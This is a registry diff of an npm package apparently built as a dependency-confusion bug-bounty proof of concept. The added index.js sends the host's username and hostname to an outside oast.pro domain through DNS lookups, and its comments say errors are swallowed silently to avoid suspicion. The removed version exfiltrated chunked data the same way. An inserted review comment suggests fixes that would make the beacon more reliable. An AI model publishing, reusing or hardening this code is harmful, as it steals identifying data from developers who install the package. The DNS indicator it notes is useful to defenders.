internal-company-module-test-1337 99.99.9995 → 99.99.9996
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +16 -40
- package/package.json +2 -2
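--- a/package/index.js
+++ b/package/index.js
@@ -1,43 +1,19 @@
 const dns = require('dns');
 const os = require('os');
 
-
-
-
-
-(
-
-
-
-
-
-
-
-
-
-
-
-const chunkSize = 20; // più piccolo = meno corruption
-const chunks = [];
-
-for (let i = 0; i < hex.length; i += chunkSize) {
-chunks.push(hex.slice(i, i + chunkSize));
-}
-
-const sessionId = Math.floor(Math.random() * 0xffff)
-.toString(16)
-.padStart(4, '0');
-
-const sleep = ms => new Promise(r => setTimeout(r, ms));
-
-for (let i = 0; i < chunks.length; i++) {
-const payload = `${sessionId}.${i}.${chunks[i]}.${attackerDomain}`;
-dns.lookup(payload, () => {});
-await sleep(200);
-}
-
-// EOF marker stabile
-dns.lookup(`${sessionId}.eof.0.${attackerDomain}`, () => {});
-
-} catch (e) {}
-})();
+// Estrae dati di base del sistema per confermare l'RCE
+const hostname = os.hostname().replace(/[^a-zA-Z0-9]/g, '');
+const username = os.userInfo().username.replace(/[^a-zA-Z0-9]/g, '');
+
+// Dominio controllato dall'attaccante (es. generato da DNSBin)
+const attackerDomain = "d7rmv8ldfm4fftabirr0q6i9urgygm6fa.oast.pro";
+
+// Costruisce il sottodominio contenente i dati esfiltrati
+// Es: root.server-prod-01.c1a2b3c4d5.dnsbin.net
+const exfilPayload = `${username}.${hostname}.${attackerDomain}`;
+
+// Esegue una risoluzione DNS per esfiltrare i dati via OOB
+dns.lookup(exfilPayload, (err, address, family) => {
+// L'errore viene ignorato silenziosamente per non destare sospetti
+// e non far fallire l'installazione npm
+});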
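Review bot: The comment at new lines 17–18 claims errors are swallowed so the npm install cannot fail, but that now holds only for the lookup callback: the removed version wrapped the whole body in `try { … } catch (e) {}`, whereas new lines 5–6 call `os.hostname()` and `os.userInfo()` at module top level with no guard, and `os.userInfo()` can throw (Node documents a SystemError when the current user has no username entry), so the file can still abort whatever invokes it — the `scripts` block that would wire it into install is outside this hunk. Either restore the guard or make the comment accurate, e.g. `// Only the lookup error is ignored; os.userInfo() above can still throw`. The `.replace(/[^a-zA-Z0-9]/g, '')` sanitizer bounds neither length nor emptiness, so a hostname over 63 characters or an empty username yields an invalid DNS name and the beacon silently never arrives, which the ignored `err` hides. Separately, the payload now carries the real username and hostname off-host to a third-party `oast.pro` interaction domain, which is more than the fixed non-identifying token most dependency-confusion bounty proofs are permitted to send; for defenders, DNS queries shaped `<user>.<host>.<label>.oast.pro` leaving a build host are the indicator this package produces.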
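--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,6 @@
 {
 "name": "internal-company-module-test-1337",
-"version": "99.99.
+"version": "99.99.9996",
 "description": "Bug Bounty PoC for Dependency Confusion",
 "main": "index.js",
 "scripts": {
@@ -9,6 +9,6 @@
 "author": "Security Researcher",
 "license": "MIT",
 "dependencies": {
-"internal-company-module-test-1337": "^99.99.
+"internal-company-module-test-1337": "^99.99.9996"
 }
 }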